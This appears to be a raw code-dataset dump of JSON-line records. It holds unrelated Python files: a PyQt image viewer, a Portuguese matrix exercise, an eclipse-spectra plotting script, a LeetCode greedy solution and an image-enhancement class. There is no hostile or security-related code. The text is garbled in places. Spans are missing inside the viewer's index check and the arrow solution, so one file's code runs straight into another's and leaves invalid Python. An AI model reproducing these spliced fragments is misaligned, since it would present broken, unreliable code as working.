pk)","repo_name":"MohamadAhmadi100/vollabor-django-plattform","sub_path":"be/zarinpal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"70319952301","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 26 16:10:00 2014\n\n@author: Kyle Ellefsen\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function, unicode_literals)\nfrom future.builtins import (bytes, dict, int, list, object, range, str, ascii, chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import pyqtSignal as Signal\nimport pyqtgraph as pg\npg.setConfigOptions(useWeave=False)\nimport os, time\nimport numpy as np\nimport global_vars as g\nfrom roi import *\n\nclass Window(QWidget):\n closeSignal=Signal()\n keyPressSignal=Signal(QEvent)\n deleteButtonSignal=Signal()\n sigTimeChanged=Signal(int)\n def __init__(self,tif,name='',filename='',commands=[],metadata=dict()):\n QWidget.__init__(self)\n self.commands=commands #commands is a list of the commands used to create this window, starting with loading the file\n self.metadata=metadata\n self.image=tif\n\n width=684\n height=585\n x=10+10\n y=484+10\n \n self.name=name\n self.filename=filename\n self.setAsCurrentWindow()\n self.setWindowTitle(os.path.basename(name))\n self.imageview=pg.ImageView(self)\n self.imageview.setMouseTracking(True)\n self.imageview.installEventFilter(self)\n #self.imageview.ui.normBtn.setParent(None) # gets rid of 'norm' button that comes with ImageView\n self.imageview.ui.roiBtn.setParent(None) # gets rid of 'roi' button that comes with ImageView\n self.imageview.setImage(tif)\n \"\"\" Here we set the initial range of the look up table. \"\"\"\n nDims=len(np.shape(self.image))\n if nDims==3:\n mt,mx,my=tif.shape\n if np.min(self.image)==0 and (np.max(self.image)==0 or np.max(self.image)==1): #if the image is binary (either all 0s or 0s and 1s)\n self.imageview.setLevels(-.01,1.01) #set levels from slightly below 0 to 1\n elif np.all(self.image[0]==0): #if the first frame is all zeros\n r=(np.min(self.image),np.max(self.image)) #set the levels to be just above and below the min and max of the entire tif\n r=(r[0]-(r[1]-r[0])/100,r[1]+(r[1]-r[0])/100)\n self.imageview.setLevels(r[0],r[1])\n else: \n r=(np.min(self.image[0]),np.max(self.image[0])) #set the levels to be just above and below the min and max of the first frame\n r=(r[0]-(r[1]-r[0])/100,r[1]+(r[1]-r[0])/100)\n self.imageview.setLevels(r[0],r[1])\n elif nDims==4:\n mt,mx,my,mc=tif.shape\n if np.min(self.image)==0 and (np.max(self.image)==0 or np.max(self.image)==1): #if the image is binary (either all 0s or 0s and 1s)\n self.imageview.setLevels(-.01,1.01) #set levels from slightly below 0 to 1\n elif nDims==2:\n mt=1\n mx,my=tif.shape\n self.mx=mx; self.my=my; self.mt=mt\n self.imageview.timeLine.sigPositionChanged.connect(self.updateindex)\n self.currentIndex=self.imageview.currentIndex\n self.layout = QVBoxLayout(self)\n self.layout.addWidget(self.imageview)\n self.layout.setContentsMargins(0,0,0,0)\n self.setGeometry(QRect(x, y, width, height))\n self.imageview.scene.sigMouseMoved.connect(self.mouseMoved)\n self.imageview.view.mouseDragEvent=self.mouseDragEvent\n self.imageview.view.mouseClickEvent=self.mouseClickEvent\n self.rois=[]\n self.currentROI=None\n self.currentROIs={}\n self.creatingROI=False\n self.scatterPlot=pg.ScatterPlotItem(size=5, pen=pg.mkPen([0,0,0,255]), brush=pg.mkBrush(255, 0, 0, 255)) #this is the plot that all the red points will be drawn on\n self.scatterPoints=[[] for _ in np.arange(mt)]\n self.scatterPlot.sigClicked.connect(self.clickedScatter)\n self.imageview.addItem(self.scatterPlot)\n self.pasteAct = QAction(\"&Paste\", self, triggered=self.paste)\n self.sigTimeChanged.connect(self.showFrame)\n \n self.closed=False\n self.show()\n \n def updateindex(self):\n (idx, t) = self.imageview.timeIndex(self.imageview.timeLine)\n t=int(np.ceil(t))\n self.currentIndex = t\n self.scatterPlot.setPoints(pos=self.scatterPoints[t])\n self.sigTimeChanged.emit(t)\n\n def setIndex(self,index):\n if index>=0 and index=image.shape[0] or self.y>=image.shape[1]:\n pass# if we are outside the image\n else:\n z=self.imageview.currentIndex\n value=image[int(self.x),int(self.y)]\n g.m.statusBar().showMessage('x={}, y={}, z={}, value={}'.format(int(self.x),int(self.y),z,value))\n for roi in self.rois:\n roi.mouseOver(self.x,self.y)\n if self.creatingROI is False:\n if roi.contains(self.x,self.y):\n self.currentROI=roi\n\n def mouseDragEvent(self, ev):\n modifiers = QApplication.keyboardModifiers()\n if modifiers == Qt.ShiftModifier:\n pass #This is how I detect that the shift key is held down.\n if ev.button() == Qt.LeftButton:\n ev.accept()\n difference=self.imageview.getImageItem().mapFromScene(ev.lastScenePos())-self.imageview.getImageItem().mapFromScene(ev.scenePos())\n self.imageview.view.translateBy(difference)\n if ev.button() == Qt.RightButton:\n ev.accept()\n if ev.isStart():\n self.ev=ev\n pt=self.imageview.getImageItem().mapFromScene(ev.buttonDownScenePos())\n self.x=pt.x() # this sets x and y to the button down position, not the current position\n self.y=pt.y()\n #print(\"Drag start x={},y={}\".format(self.x,self.y))\n for roi in self.rois:\n roi.mouseOver(self.x,self.y)\n if any([r.mouseIsOver for r in self.rois]): #if any roi is moused over\n self.currentROIs=[r for r in self.rois if r.mouseIsOver]\n self.creatingROI=False\n else:\n self.creatingROI=True\n self.currentROI=ROI(self,self.x,self.y)\n if ev.isFinish():\n if self.creatingROI:\n self.currentROI.drawFinished()\n self.creatingROI=False\n else: \n for r in self.currentROIs:\n r.finish_translate()\n else: # if we are in the middle of the drag between starting and finishing\n #if inImage:\n if self.creatingROI:\n self.currentROI.extend(self.x,self.y)\n else:\n difference=self.imageview.getImageItem().mapFromScene(ev.scenePos())-self.imageview.getImageItem().mapFromScene(ev.lastScenePos())\n if difference.isNull():\n return\n for r in self.currentROIs:\n r.translate(difference,self.imageview.getImageItem().mapFromScene(ev.lastScenePos()))\n\n def updateTimeStampLabel(self,frame):\n if self.framerate==0:\n label.setHtml(\"Frame rate is 0 Hz\" )\n time=frame/self.framerate\n label=self.timeStampLabel\n if time<1:\n time=time*1000\n label.setHtml(\"{:.0f} ms\".format(time))\n elif time<60:\n label.setHtml(\"{:.3f} s\".format(time))\n elif time<3600:\n minutes=int(np.floor(time/60))\n seconds=time % 60\n label.setHtml(\"{}m {:.3f} s\".format(minutes,seconds))\n else:\n hours=int(np.floor(time/3600))\n mminutes=time-hours*3600\n minutes=int(np.floor(mminutes/60))\n seconds=mminutes-minutes*60\n label.setHtml(\"{}h {}m {:.3f} s\".format(hours,minutes,seconds))\n","repo_name":"BrettJSettle/MotilityTracking","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":11464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"70667804779","text":"\"\"\"\n5- Leia uma matriz 5x5. Leia também um valor X. O programa deverá fazer\numa busca desse valor na matriz e, ao final, escrever a localização\n(linha e coluna) ou uma mensagem de 'não encontrado'.\n\"\"\"\n\nmatriz = [[], [], [], [], []]\npos_de_x = []\n\nprint('Preencha a matriz:')\nfor i in range(4):\n for j in range(4):\n matriz[i].append((int(input(f'M[{i},{j}] = '))))\n\nvalor_x = int(input('\\nDigite o valor X: '))\n\nfor i in range(4):\n for j in range(4):\n if matriz[i][j] == valor_x:\n pos_de_x.append(str(f'M[{i},{j}]'))\n\nif len(pos_de_x) > 0:\n print(f'\\nPosições onde encontramos X = {valor_x}: ')\n for i in pos_de_x:\n print(i)\nelse:\n print(f'X = {valor_x} não encontrado.')\n\n\n\n","repo_name":"Fulvio7/curso-python-guppe","sub_path":"guppe/exercicios_secao_7/pt_2/ex_5.py","file_name":"ex_5.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71675049579","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.io import fits\nfrom glob import glob\nimport os\nfrom astropy.visualization import ZScaleInterval, ImageNormalize, LogStretch, AsymmetricPercentileInterval\nimport h5py \nfrom astropy.nddata import CCDData\nfrom PIL import Image\nfrom datetime import datetime, timedelta\nfrom ccdproc import ImageFileCollection\nimport pandas as pd\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\nfrom matplotlib.ticker import AutoLocator, AutoMinorLocator, FixedLocator, FixedFormatter, LogLocator, StrMethodFormatter\nfrom matplotlib import patches\nfrom matplotlib.markers import MarkerStyle\nimport cmcrameri.cm as cmcm\nimport cmasher as cmr\nfrom scipy import ndimage\nimport copy\n\nvideo_frame_fnames = sorted(glob(\"../../sav/Eclipse/Video/frame*.jpg\"))\nvideo_frame_fnames = video_frame_fnames[34:200]\n\nvideo_frame_cube = np.zeros((1080,1920,3,200-34),dtype=\"uint8\")\nfor ii, video_frame_fname in enumerate(video_frame_fnames):\n with Image.open(video_frame_fname) as im:\n video_frame_cube[:,:,:,ii] = np.asarray(im)\n\nvideo_vertical_slice = slice(390,710)\nvideo_horizontal_slice = slice(746,1160)\nvideo_frame_cube = video_frame_cube[video_vertical_slice,video_horizontal_slice,:,:]\n\nvideo_time_array = np.arange(datetime(2017,8,21,17,45,23),datetime(2017,8,21,17,48,9),timedelta(seconds=1)).astype(datetime)\nvideo_time_array = video_time_array[13:97]\n\nslit_pos = 209.4\nrotate_angle_context = -28.\nsun_center_pixel_plot = np.array([300,220])\n\nwith h5py.File(\"../../sav/Eclipse/LimbTrack/sun_pos_linear_fit.h5\", 'r') as hf:\n sun_x_fitparam = hf['sun_x_fitparam'][:]\n sun_y_fitparam = hf['sun_y_fitparam'][:]\n\nsun_x_fitpoly = np.poly1d(sun_x_fitparam)\nsun_y_fitpoly = np.poly1d(sun_y_fitparam)\n\ngreen_path = \"../../src/EclipseSpectra2017/MikesData_l1/Green/\"\nred_path = \"../../src/EclipseSpectra2017/MikesData_l1/Red/\"\n\ntotality_green_im_collection = ImageFileCollection(green_path,\n glob_include=\"TotalitySequence*.fit\")\ntotality_green_df = totality_green_im_collection.summary.to_pandas()\ntotality_green_df[\"date-obs\"] = pd.to_datetime(totality_green_df[\"date-obs\"])\n\ntotality_red_im_collection = ImageFileCollection(red_path,\n glob_include=\"TotalitySequence*.fit\")\ntotality_red_df = totality_red_im_collection.summary.to_pandas()\ntotality_red_df[\"date-obs\"] = pd.to_datetime(totality_red_df[\"date-obs\"])\n\nFeXI_line_cont_frame = CCDData.read(\"../../src/EclipseSpectra2017/MitchellData/MitchellFeXILine_ContRatio.fits\",unit=\"adu\")\nFeXI_line_cont_image = FeXI_line_cont_frame.data\nsun_center_FeXI = (np.float64(FeXI_line_cont_frame.header[\"SUNX\"]),np.float64(FeXI_line_cont_frame.header[\"SUNY\"]))\nFeXI_line_cont_xslice = slice(372-300,372+301)\nFeXI_line_cont_yslice = slice(383-220,383+221)\nFeXI_line_cont_cutout = FeXI_line_cont_image[FeXI_line_cont_yslice, FeXI_line_cont_xslice]\nFeXI_rotate_center = (sun_center_FeXI[0] - FeXI_line_cont_xslice.start, sun_center_FeXI[1] - FeXI_line_cont_yslice.start)\nFeXI_line_cont_image_rot_scipy = ndimage.rotate(FeXI_line_cont_cutout, angle=360 - np.float64(FeXI_line_cont_frame.header[\"SUNROT\"]),reshape=False,order=1)\n\n\nFeXIV_line_cont_frame = CCDData.read(\"../../src/EclipseSpectra2017/MitchellData/MitchellFeXIVLine_ContRatio.fits\",unit=\"adu\")\nFeXIV_line_cont_image = FeXIV_line_cont_frame.data\nsun_center_FeXIV = (np.float64(FeXIV_line_cont_frame.header[\"SUNX\"]),np.float64(FeXIV_line_cont_frame.header[\"SUNY\"]))\nFeXIV_line_cont_xslice = slice(372-300,372+301)\nFeXIV_line_cont_yslice = slice(383-220,383+221)\nFeXIV_line_cont_cutout = FeXIV_line_cont_image[FeXIV_line_cont_yslice, FeXIV_line_cont_xslice]\nFeXIV_rotate_center = (sun_center_FeXIV[0] - FeXIV_line_cont_xslice.start, sun_center_FeXIV[1] - FeXIV_line_cont_yslice.start)\nFeXIV_line_cont_image_rot_scipy = ndimage.rotate(FeXIV_line_cont_cutout, angle=360 - np.float64(FeXIV_line_cont_frame.header[\"SUNROT\"]),reshape=False,order=1)\n\nrsun_arcsec = 950.0\nrsun_context_pixel = 71.4\npixel_ratio = rsun_context_pixel/np.float64(FeXI_line_cont_frame.header[\"MOONR\"])\nimg_pixel_to_arcsec = np.float64(FeXI_line_cont_frame.header[\"SUNR\"])/rsun_arcsec\npixel_ratio_to_arcsec = rsun_context_pixel/np.float64(FeXI_line_cont_frame.header[\"MOONR\"])*img_pixel_to_arcsec\n\ngs_kw = dict(width_ratios=[1,2.2],hspace=0.05)\n\neis_eqs_xcen, eis_eqs_ycen = np.array((-895.061, 390.811))\neis_eqs_fovx, eis_eqs_fovy = np.array((119.808, 160.0))\neis_eqs_xstart = eis_eqs_xcen - eis_eqs_fovx/2.\neis_eqs_xend = eis_eqs_xcen + eis_eqs_fovx/2.\neis_eqs_ystart = eis_eqs_ycen - eis_eqs_fovy/2.\neis_eqs_yend = eis_eqs_ycen + eis_eqs_fovy/2.\n\neis_spch_fovx, eis_spch_fovy = np.array((60.,512.))\neis_spch_xstart = -15.\neis_spch_xend = 45.\neis_spch_ystart = -1358.5\neis_spch_yend = -855.\n\ndef create_rec_eqs():\n return patches.Rectangle((eis_eqs_xstart, eis_eqs_ystart),\n eis_eqs_fovx, eis_eqs_fovy,linewidth=0,edgecolor=\"grey\",\n facecolor=\"grey\",alpha=0.6)\ndef create_rec_spch():\n return patches.Rectangle((eis_spch_xstart, eis_spch_ystart),\n eis_spch_fovx, eis_spch_fovy,linewidth=0,edgecolor=\"grey\",\n facecolor=\"grey\",alpha=0.6)\n\n\nimg_center = np.array([300,220])\nimg_xpixel_array = np.arange(FeXIV_line_cont_image_rot_scipy.shape[1])\nimg_ypixel_array = np.arange(FeXIV_line_cont_image_rot_scipy.shape[0])\n\ndef func_img_xpixel_to_xarcsec(x):\n return (x - img_center[0])/img_pixel_to_arcsec\n\ndef func_img_xarcsec_to_xpixel(x):\n return x*img_pixel_to_arcsec + img_center[0]\n\ndef func_img_ypixel_to_yarcsec(x):\n return (x - img_center[1])/img_pixel_to_arcsec\n\ndef func_img_yarcsec_to_ypixel(x):\n return x*img_pixel_to_arcsec + img_center[1]\ndef func_one_to_one(x):\n return x\n\nimg_xarcsec_array = func_img_xpixel_to_xarcsec(img_xpixel_array)\nimg_yarcsec_array = func_img_ypixel_to_yarcsec(img_ypixel_array)\n\nfor ii, ii_time in enumerate(video_time_array[:]):\n fig, axes = plt.subplots(2,2,figsize=(16,9),gridspec_kw=gs_kw,constrained_layout=True)\n ((ax_img, ax_specg),(ax_imr, ax_specr)) = axes\n\n ax_img.pcolormesh(img_xarcsec_array,img_yarcsec_array,FeXIV_line_cont_image_rot_scipy,vmin=0.2,vmax=1.2,\n cmap=cmr.jungle_r,shading=\"auto\",rasterized=True)\n ax_imr.pcolormesh(img_xarcsec_array,img_yarcsec_array,FeXI_line_cont_image_rot_scipy,vmin=1,vmax=4,\n cmap=cmcm.lajolla,shading=\"auto\",rasterized=True)\n\n \n ax_img.add_patch(create_rec_eqs())\n ax_imr.add_patch(create_rec_eqs())\n ax_img.add_patch(create_rec_spch())\n ax_imr.add_patch(create_rec_spch())\n\n ax_img.set_title(\"Fe XIV 530.3 nm {}\".format(ii_time.strftime(\"%H:%M:%S\")),fontsize=14)\n ax_imr.set_title(\"Fe XI 789.2 nm {}\".format(ii_time.strftime(\"%H:%M:%S\")),fontsize=14)\n \n ax_img_xpixel = ax_img.secondary_xaxis(\"top\",functions=(func_img_xarcsec_to_xpixel,func_img_xpixel_to_xarcsec))\n ax_img_ypixel = ax_img.secondary_yaxis(\"right\",functions=(func_img_yarcsec_to_ypixel,func_img_ypixel_to_yarcsec))\n\n ax_imr_xpixel = ax_imr.secondary_xaxis(\"top\",functions=(func_img_xarcsec_to_xpixel,func_img_xpixel_to_xarcsec))\n ax_imr_ypixel = ax_imr.secondary_yaxis(\"right\",functions=(func_img_yarcsec_to_ypixel,func_img_ypixel_to_yarcsec))\n\n for ax_ in (ax_img_xpixel,ax_img_ypixel,ax_imr_xpixel,ax_imr_ypixel):\n ax_.tick_params(labelsize=12)\n\n ax_img.set_ylabel(\"Solar-Y [arcsec]\",fontsize=14)\n ax_imr.set_xlabel(\"Solar-X [arcsec]\",fontsize=14)\n ax_imr.set_ylabel(\"Solar-Y [arcsec]\",fontsize=14)\n\n\n\n if ii < 5:\n slit_xshift = sun_x_fitpoly(5) - slit_pos\n else:\n slit_xshift = sun_x_fitpoly(ii) - slit_pos\n\n slit_center_x = - slit_xshift/pixel_ratio_to_arcsec*np.cos(np.deg2rad(np.abs(rotate_angle_context)))\n slit_center_y = slit_xshift/pixel_ratio_to_arcsec*np.sin(np.deg2rad(np.abs(rotate_angle_context)))\n\n slit_top_x = slit_center_x + rsun_arcsec*np.sin(np.deg2rad(np.abs(rotate_angle_context)))\n slit_top_y = slit_center_y + rsun_arcsec*np.cos(np.deg2rad(np.abs(rotate_angle_context)))\n\n slit_bottom_x = 2*slit_center_x - slit_top_x\n slit_bottom_y = 2*slit_center_y - slit_top_y\n\n slit_limb_marker = MarkerStyle(\"_\")\n slit_limb_marker._transform.rotate_deg(-30)\n\n ax_img.scatter([slit_bottom_x, slit_top_x],[slit_bottom_y, slit_top_y],s=20,marker=slit_limb_marker,color=\"red\",alpha=0.8)\n ax_imr.scatter([slit_bottom_x, slit_top_x],[slit_bottom_y, slit_top_y],s=20,marker=slit_limb_marker,color=\"red\",alpha=0.8)\n\n\n ax_img.axline((slit_center_x,slit_center_y),slope=1/np.tan(np.deg2rad(np.abs(rotate_angle_context))),color=\"red\",lw=2,alpha=0.8)\n ax_imr.axline((slit_center_x,slit_center_y),slope=1/np.tan(np.deg2rad(np.abs(rotate_angle_context))),color=\"red\",lw=2,alpha=0.8)\n\n\n green_nearest_fname = totality_green_df.loc[(totality_green_df['date-obs'] \n - video_time_array[ii]).abs().idxmin(),\"file\"]\n red_nearest_fname = totality_red_df.loc[(totality_red_df['date-obs'] \n - video_time_array[ii]).abs().idxmin(),\"file\"]\n\n green_frame = CCDData.read(os.path.join(green_path,green_nearest_fname),hdu=0,unit=\"adu\")\n green_wavelength = CCDData.read(os.path.join(green_path,green_nearest_fname),hdu=1,unit=\"angstrom\").data\n red_frame = CCDData.read(os.path.join(red_path,red_nearest_fname),hdu=0,unit=\"adu\")\n red_wavelength = CCDData.read(os.path.join(red_path,red_nearest_fname),hdu=1,unit=\"angstrom\").data\n\n green_image = green_frame.data/green_frame.header[\"EXPTIME\"]\n red_image = red_frame.data/red_frame.header[\"EXPTIME\"]\n\n norm_green = ImageNormalize(green_image,stretch=LogStretch())\n norm_red = ImageNormalize(red_image,stretch=LogStretch())\n\n # im_green = ax_specg.pcolormesh(np.arange(green_frame.header[\"NAXIS1\"]),np.arange(green_frame.header[\"NAXIS2\"]),\n # green_image,cmap=cmcm.lajolla,norm=norm_green,shading='auto',rasterized=True)\n\n im_green = ax_specg.pcolormesh(green_wavelength/62./10.,np.arange(green_frame.header[\"NAXIS2\"]) + green_frame.header[\"YWS\"],\n green_image,cmap=cmcm.lajolla,norm=norm_green,shading='auto',rasterized=True)\n \n\n # im_red = ax_specr.pcolormesh(np.arange(red_frame.header[\"NAXIS1\"]),np.arange(green_frame.header[\"NAXIS2\"]),\n # red_image,cmap=cmcm.lajolla,norm=norm_red,shading='auto',rasterized=True)\n\n im_red = ax_specr.pcolormesh(red_wavelength/52./10.,np.arange(red_frame.header[\"NAXIS2\"]) + red_frame.header[\"YWS\"],\n red_image,cmap=cmcm.lajolla,norm=norm_red,shading='auto',rasterized=True)\n\n ax_specg.set_title(\"Green Detector {} {}\".format(green_frame.header[\"DATE-OBS\"][-8:],green_nearest_fname),fontsize=14)\n\n ax_specr.set_title(\"Red Detector {} {}\".format(red_frame.header[\"DATE-OBS\"][-8:],red_nearest_fname),fontsize=14)\n \n ax_specg.invert_yaxis()\n ax_specr.invert_yaxis()\n\n ax_specg.set_xlabel(\"62nd order Wavelength [nm]\",fontsize=14)\n ax_specg.set_ylabel(\"CCD-Y [Pixel]\",fontsize=14)\n \n ax_specr.set_xlabel(\"52nd order Wavelength [nm]\",fontsize=14)\n ax_specr.set_ylabel(\"CCD-Y [Pixel]\",fontsize=14)\n\n for ax_ in (axes.flatten()):\n ax_.tick_params(labelsize=12)\n \n ax_specg_2 = ax_specg.twiny()\n ax_specg_2.set_xlim((green_frame.header[\"NAXIS1\"]-0.5,green_frame.header[\"XWS\"]-0.5))\n ax_specr_2 = ax_specr.twiny()\n ax_specr_2.set_xlim((red_frame.header[\"XWS\"]-0.5,red_frame.header[\"NAXIS1\"]-0.5))\n\n for ax_ in (ax_specg_2,ax_specr_2):\n ax_.tick_params(labelsize=12)\n\n FeXIV_tick_locs = 530.286*np.array([63.,62.,61.])/62.\n FeX_tick_locs = 637.451*np.array([51.,52.,53.])/52.\n\n green_limb_locs = np.array([396,625])\n red_limb_locs = np.array([366,592])\n\n # green_limb_locs = np.array([396,625]) + (sun_y_fitpoly(ii) - sun_y_fitpoly(70))/rsun_context_pixel*np.diff(green_limb_locs)\n # red_limb_locs = np.array([366,592]) + (sun_y_fitpoly(ii) - sun_y_fitpoly(70))/rsun_context_pixel*np.diff(red_limb_locs)\n\n ax_specg_xlim = ax_specg.get_xlim()\n ax_specg_ylim = ax_specg.get_ylim()\n ax_specr_xlim = ax_specr.get_xlim()\n ax_specr_ylim = ax_specr.get_ylim()\n\n ax_specg.set_xticks(list(ax_specg.get_xticks()) + FeXIV_tick_locs.tolist())\n ax_specr.set_xticks(list(ax_specr.get_xticks()) + FeX_tick_locs.tolist())\n\n ax_specg.xaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))\n ax_specr.xaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))\n ax_specg.yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))\n ax_specr.yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))\n\n #fig.canvas.draw()\n #print(ax_specg.get_xmajorticklabels())\n\n for FeXIV_xtickline, FeXIV_xticklabel, xtick_loc in zip(filter(lambda x: x.get_marker() == 3, ax_specg.get_xticklines()),\n ax_specg.get_xticklabels(),ax_specg.xaxis.get_ticklocs()):\n if xtick_loc in FeXIV_tick_locs:\n FeXIV_xticklabel.set_visible(False)\n FeXIV_xtickline.set_markeredgecolor(\"red\")\n FeXIV_xtickline.set_markeredgewidth(3)\n\n for FeX_xtickline, FeX_xticklabel, xtick_loc in zip(filter(lambda x: x.get_marker() == 3, ax_specr.get_xticklines()),\n ax_specr.get_xticklabels(),ax_specr.xaxis.get_ticklocs()):\n if xtick_loc in FeX_tick_locs:\n FeX_xticklabel.set_visible(False)\n FeX_xtickline.set_markeredgecolor(\"red\")\n FeX_xtickline.set_markeredgewidth(3)\n \n # print([x_.get_marker() for x_ in ax_specg.get_yticklines()])\n\n #after the slit is pointed to off-limbs\n if ii >= 66:\n ax_specg.set_yticks(list(ax_specg.get_yticks()) + green_limb_locs.tolist())\n ax_specr.set_yticks(list(ax_specr.get_yticks()) + red_limb_locs.tolist())\n\n for green_limb_ytickline, green_limb_yticklabel, ytick_loc in zip(filter(lambda x: x.get_marker() == 0, ax_specg.get_yticklines()),\n ax_specg.get_yticklabels(),ax_specg.yaxis.get_ticklocs()):\n\n if ytick_loc in green_limb_locs:\n green_limb_yticklabel.set_visible(False)\n green_limb_ytickline.set_markeredgecolor(\"red\")\n green_limb_ytickline.set_markeredgewidth(3)\n\n for red_limb_ytickline, red_limb_yticklabel, ytick_loc in zip(filter(lambda x: x.get_marker() == 0, ax_specr.get_yticklines()),\n ax_specr.get_yticklabels(),ax_specr.yaxis.get_ticklocs()):\n if ytick_loc in red_limb_locs:\n red_limb_yticklabel.set_visible(False)\n red_limb_ytickline.set_markeredgecolor(\"red\")\n red_limb_ytickline.set_markeredgewidth(3)\n\n ax_specg.set_xlim(ax_specg_xlim)\n ax_specr.set_xlim(ax_specr_xlim)\n ax_specg.set_ylim(ax_specg_ylim)\n ax_specr.set_ylim(ax_specr_ylim)\n\n ax_specg_right = ax_specg.secondary_yaxis(\"right\",functions=(func_one_to_one, func_one_to_one))\n ax_specg_right.tick_params(labelright=False)\n ax_specr_right = ax_specr.secondary_yaxis(\"right\",functions=(func_one_to_one, func_one_to_one))\n ax_specr_right.tick_params(labelright=False)\n\n for ax_ in (ax_img, ax_imr):\n ax_.set_aspect(1)\n\n \n # plt.show()\n plt.savefig(fname=os.path.join(\"../../sav/Eclipse/Video_RotSlit_SpecCorr/\",\"Video_RotSlit_SpecCorr_{:03d}.png\".format(ii)),format=\"png\",\n dpi=144,bbox_inches=\"tight\")\n fig.clf()\n for ax_ in axes.flatten():\n ax_.cla()\n plt.close(fig)\n","repo_name":"yjzhu-solar/Eclipse2017","sub_path":"ipynb/eclipse_data/create_eclipse_video_slit_correct_spectra.py","file_name":"create_eclipse_video_slit_correct_spectra.py","file_ext":"py","file_size_in_byte":15509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"73982058540","text":"# Approach 1- Greedy\ndef findMinArrowShots(points): # TC O(n log n) // SC O(n) --> timsort algo\n\tif not points: return 0\n\tpoints.sort(key= lambda x:x[1])\n\tfirstEnd=points[0][1]\n\tarrows=1\n\tfor start,end in points:\n\t\t# if the current balloon starts after the end of another one,\n # one needs one more arrow\n\t\tif firstEnd= self.height\n zoom[1] = shape[1] >= self.width\n\n if zoom[0]:\n factor[0] = shape[0] * 1.0 / self.height\n else:\n factor[0] = self.height * 1.0 / shape[0]\n if zoom[1]:\n factor[1] = shape[1] * 1.0 / self.width\n else:\n factor[1] = self.width * 1.0 / shape[1]\n\n if (int(factor[0]) != factor[0] or int(factor[1]) != factor[1]):\n raise ValueError(\"Resize not of integer factor!\")\n\n factor[0] = int(factor[0])\n factor[1] = int(factor[1])\n\n i = 0\n for chn in self.channels:\n if zoom[0]:\n chn = chn.repeat([factor[0]] * chn.shape[0], axis=0)\n else:\n chn = chn[[idx * factor[0]\n for idx in range(int(self.height / factor[0]))],\n :]\n if zoom[1]:\n self.channels[i] = chn.repeat([factor[1]] * chn.shape[1],\n axis=1)\n else:\n self.channels[i] = chn[:,\n [idx * factor[1]\n for idx in range(int(self.width /\n factor[1]))]]\n\n i = i + 1\n\n self.height = self.channels[0].shape[0]\n self.width = self.channels[0].shape[1]\n self.shape = self.channels[0].shape\n\n def replace_luminance(self, luminance):\n \"\"\"Replace the Y channel of the image by the array *luminance*.\n\n If the image is not in YCbCr mode, it is converted automatically to\n and from that mode.\n \"\"\"\n if self.is_empty():\n return\n\n if luminance.shape != self.channels[0].shape:\n if ((luminance.shape[0] * 1.0 / luminance.shape[1]) ==\n (self.channels[0].shape[0] * 1.0 / self.channels[0].shape[1])):\n if luminance.shape[0] > self.channels[0].shape[0]:\n self.resize(luminance.shape)\n else:\n raise NameError(\"Luminance smaller than the image !\")\n else:\n raise NameError(\"Not the good shape !\")\n\n mode = self.mode\n if mode.endswith(\"A\"):\n self.convert(\"YCbCrA\")\n self.channels[0] = luminance\n self.convert(mode)\n else:\n self.convert(\"YCbCr\")\n self.channels[0] = luminance\n self.convert(mode)\n\n def enhance(self, inverse=False, gamma=1.0, stretch=\"no\",\n stretch_parameters=None, **kwargs):\n \"\"\"Image enhancement function.\n\n It applies **in this order** inversion,\n gamma correction, and stretching to the current image, with parameters\n *inverse* (see :meth:`Image.invert`), *gamma* (see\n :meth:`Image.gamma`), and *stretch* (see :meth:`Image.stretch`).\n \"\"\"\n self.invert(inverse)\n if stretch_parameters is None:\n stretch_parameters = {}\n\n stretch_parameters.update(kwargs)\n self.stretch(stretch, **stretch_parameters)\n self.gamma(gamma)\n\n def gamma(self, gamma=1.0):\n \"\"\"Apply gamma correction to the channels of the image.\n\n If *gamma* is a\n tuple, then it should have as many elements as the channels of the\n image, and the gamma correction is applied elementwise. If *gamma* is a\n number, the same gamma correction is applied on every channel, if there\n are several channels in the image. The behaviour of :func:`gamma` is\n undefined outside the normal [0,1] range of the channels.\n \"\"\"\n if (isinstance(gamma, (list, tuple, set)) and len(gamma) != len(self.channels)):\n raise ValueError(\"Number of channels and gamma components differ.\")\n if isinstance(gamma, (tuple, list)):\n gamma_list = list(gamma)\n else:\n gamma_list = [gamma] * len(self.channels)\n for i in range(len(self.channels)):\n gamma = float(gamma_list[i])\n if gamma < 0:\n raise ValueError(\"Gamma correction must be a positive number.\")\n logger.debug(\"Applying gamma %f\", gamma)\n if gamma == 1.0:\n continue\n\n if isinstance(self.channels[i], np.ma.core.MaskedArray):\n if ne:\n self.channels[i] = np.ma.array(\n ne.evaluate(\"data ** (1.0 / gamma)\",\n local_dict={\"data\": self.channels[i].data,\n 'gamma': gamma}),\n mask=self.channels[i].mask,\n copy=False)\n else:\n self.channels[i] = np.ma.array(self.channels[i].data **\n (1.0 / gamma),\n mask=self.channels[i].mask,\n copy=False)\n else:\n self.channels[i] = np.where(self.channels[i] >= 0,\n self.channels[i] **\n (1.0 / gamma),\n self.channels[i])\n\n def stretch(self, stretch=\"crude\", **kwargs):\n \"\"\"Apply stretching to the current image.\n\n The value of *stretch* sets\n the type of stretching applied. The values \"histogram\", \"linear\",\n \"crude\" (or \"crude-stretch\") perform respectively histogram\n equalization, contrast stretching (with 5% cutoff on both sides), and\n contrast stretching without cutoff. The value \"logarithmic\" or \"log\"\n will do a logarithmic enhancement towards white. If a tuple or a list\n of two values is given as input, then a contrast stretching is performed\n with the 